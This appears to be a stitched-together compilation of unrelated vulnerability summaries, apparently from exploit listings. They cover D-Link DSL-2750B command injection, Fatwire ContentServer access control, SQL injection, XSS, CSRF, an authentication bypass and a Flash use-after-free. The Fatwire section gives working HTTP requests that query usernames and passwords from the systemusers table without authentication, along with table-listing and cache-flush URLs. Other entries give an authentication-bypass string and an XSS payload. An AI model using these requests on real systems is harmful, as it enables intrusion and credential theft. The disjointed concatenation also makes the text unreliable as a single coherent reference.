This module exploits a remote command injection vulnerability in D-Link DSL-2750B devices. The vulnerability can be exploited through the 'cli' parameter, which is passed directly to the 'ayecli' binary. Vulnerable firmware versions range from 1.01 up to 1.03.
It has been discovered that there is incorrect access control over several resources in previous versions of Fatwire (confirmed on FutureTenseContentServer 5.5.2 and 7.5) that allows sending SQL queries and querying the tables and database schema without authentication.

PoC: Improper Access Control

PAYLOAD: SQL query

POST /cs/Satellite HTTP/1.1
Host: www.example.com
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 98

tbl=AArticles&query=select+username%2Cpassword+from+systemusers&pagename=Support%2FVerify%2Fexport

PAYLOAD: show all database tables

https://www.example.com/cs/Satellite?pagename=Support/Verify/tablelistHTML
https://www.example.com/cs/Satellite?pagename=Support/CacheManager/FlushTables&cmd=null

OR, as a POST request:

POST /cs/Satellite HTTP/1.1
Host: www.example.com
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 98

pagename=Support/Verify/tablelistHTML

PAYLOAD: URL listing the installed site IDs

https://www.example.com/cs/Satellite?pagename=OpenMarket/Demos/index
When an unauthenticated user navigates through the application, the application assigns a cookie; that cookie is carried in the ~session parameter, so an attacker could fix the ~session value through a GET request. Together with the fact that the SERVICEUNIQUE parameter has a parameter validation flaw, this results in a single-use XSS, since the session expires once the request method is changed and the value is fixed in the URL.
The vulnerability allows an attacker to inject SQL commands from the user search section via the 'my_item_search' parameter.
An authentication bypass vulnerability exists in EU MRV Regulatory Complete Solution 1, which allows an attacker to bypass authentication by entering '=''or' as both the username and the password.
A Cross-Site Scripting (XSS) vulnerability exists in Honeywell XL Web Controller due to improper validation of user-supplied input. An attacker can exploit this vulnerability to inject malicious script code into the application, which will be executed in the context of the user's browser. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
A Cross-Site Request Forgery (CSRF) vulnerability exists in Timber - Ultimate Freelancer Platform 1.1, which allows an attacker to perform malicious actions on behalf of an authenticated user. An attacker can craft a malicious HTML page containing a form with pre-filled values that is submitted to the vulnerable application. This can be used to update the user profile with attacker-controlled values.
The vulnerability allows an attacker to inject SQL commands from the search section via the 'keyword' parameter. Either the GET or the POST method can be used to exploit the vulnerability. The SQLi payload types are boolean-based blind, error-based and AND/OR time-based blind. The payload for XSS is <script>alert(1)</script>
CVE-2015-5112 is a vulnerability in Adobe Flash Player 18.0.0.194 and earlier versions. It allows an attacker to execute arbitrary code on the target system by exploiting a use-after-free vulnerability in the ActionScript 3 (AS3) virtual machine. The vulnerability is triggered when a maliciously crafted SWF file is loaded by the vulnerable Flash Player.
The vulnerability allows an attacker to inject SQL commands from the search section via the 'query' parameter. Either the GET or the POST method can be used. The working payload types are "AND boolean-based blind - WHERE or HAVING clause" and "Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)".